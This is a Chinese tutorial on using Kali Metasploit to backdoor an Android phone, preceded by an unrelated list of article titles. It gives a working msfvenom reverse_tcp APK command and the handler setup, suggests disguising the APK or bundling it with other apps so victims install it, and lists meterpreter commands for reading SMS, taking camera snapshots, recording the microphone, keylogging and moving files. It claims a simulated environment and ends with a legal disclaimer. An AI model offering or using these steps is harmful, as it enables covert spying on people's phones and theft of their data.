- 1一.Apache Griffin概述
- 2一文了解亚马逊云科技最新大语言模型_亚马逊大语言模型
- 3Python专题复习整理_python复习资料
- 4软考重点突破之程序语言基础知识_软考程序设计语言基础知识
- 5LeetCode:547. 省份数量(并查集 Java)
- 6xmlspy 不能载入具有目标命名空间_MongoDB 数据库的命名、设计规范
- 7ERROR 1396 (HY000): Operation CREATE USER failed for ‘root‘@‘%‘
- 8【SQL】将表的某一列默认值设为“XXX”_sql语句如何给列设置默认值
- 9媒体专访|知道创宇黑哥:视野和格局将决定网络空间测绘的未来!
- 10Android应用开发之所有动画使用详解_安卓开发页面间动画
Kali利用MSF渗透安卓手机_kali入侵安卓手机
赞
踩
该环境均为模拟环境
一、什么是MSF
MSF是一个综合性渗透测试工具,集成信息收集、漏洞扫描、漏洞利用以及提权等功能的工具
二、演示环境
kali ip: 192.168.249.137
夜神模拟器 Android7.1.2
三、渗透过程
1.使用root权限
su root
2.生成可执行后门文件
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.249.130 LPORT=5555 R >Android.apkLHOST的IP写自己kali的ip,LPORT选一个没占用的端口,apk的名字自定义
运行代码生成文件
3.将生成的后门文件,放入靶机
4. 运行msfconsole命令
5.参数配置
- use exploit/multi/handler (选择模块)
- set payload android/meterpreter/reverse_tcp (选择攻击模块)
- set LhOST 192.168.249.130 (本地ip)
- set lport 5555 (端口)
参数配置完成,查看配置
show options
exploit 运行6.在靶机运行后门程序
我们可以把这个程序伪装一下,把他的图标改一下,或者把它捆绑在某些软件上面,当用户打开就自动安装到对方电脑上面
四、命令执行
1.查看对方手机系统信息
命令 sysinfo
2.查看对方手机安装哪些app文件
命令: app_list
3.控制摄像头拍摄一张照片
命令 webcam_snap
4.实时查看靶机的信息
命令 dump_sms
5.上传文件到靶机
upload /文件 /目标地址 
6.下载文件到本机
download 文件 
还可以查看帮助文档,命令
help
cmd指令:
cat 读取文件内容到屏幕
cd 更改目录
checksum 检索文件的校验和
cp 将源复制到目标
del 删除指定文件
dir 列出文件(ls 的别名)
下载 下载文件或目录
编辑 编辑文件
getlwd 打印本地工作目录
getwd 打印工作目录
lcd 更改本地工作目录
lls 列出本地文件
lpwd 打印本地工作目录
ls 列出文件
mkdir 创建目录
mv 将源移动到目标
pwd 打印工作目录
rm 删除指定文件
rmdir 删除目录
search 搜索文件
show_mount 列出所有挂载点/逻辑驱动器
upload 上传文件或目录
pkill 按名称终止进程
meterpreter命令:
keyscan_start 开始捕获击键(开始键盘记录)
keyscan_dump 转储按键缓冲(下载键盘记录)
keyscan_stop 停止捕获击键(停止键盘记录)
record_mic X秒从默认的麦克风record_mic音频记录(音频录制)
webcam_chat 开始视频聊天(视频,对方会有弹窗)
webcam_list 单摄像头(查看摄像头列表)
webcam_snap 采取快照从指定的摄像头(摄像头拍摄一张照片)
webcam_stream 播放视频流从指定的摄像头(开启摄像头监控)
enumdesktops 列出所有可访问的桌面和窗口站(窗体列表)
getdesktop 得到当前的Meterpreter桌面
reboot 重新启动远程计算机
shutdown 关闭远程计算机
shell 放入系统命令 shell
enumdesktops 列出所有可访问的桌面和窗口站
getdesktop 获取当前的meterpreter桌面
idletime 返回远程用户空闲的秒数
keyboard_send 发送击键
keyevent 发送按键事件
keyscan_dump 转储击键缓冲区
keyscan_start 开始捕获击键
keyscan_stop 停止捕获击键
mouse 发送鼠标事件
screenshare 实时观看远程用户桌面
screenshot 抓取交互式桌面的屏幕截图
setdesktop 更改 Meterpreters 当前桌面
uictl 控制一些用户界面组件
record_mic 从默认麦克风录制音频 X 秒
webcam_chat 开始视频聊天
webcam_list 列出网络摄像头
webcam_snap 从指定的网络摄像头拍摄快照
webcam_stream 播放来自指定网络摄像头的视频流
play 在目标系统上播放波形音频文件 (.wav)
getsystem 尝试将您的权限提升到本地系统的权限
execute -f notepad 打开记事本
该实验为模拟环境,未经授权的渗透都是违法行为,我们都是守法的好公民。
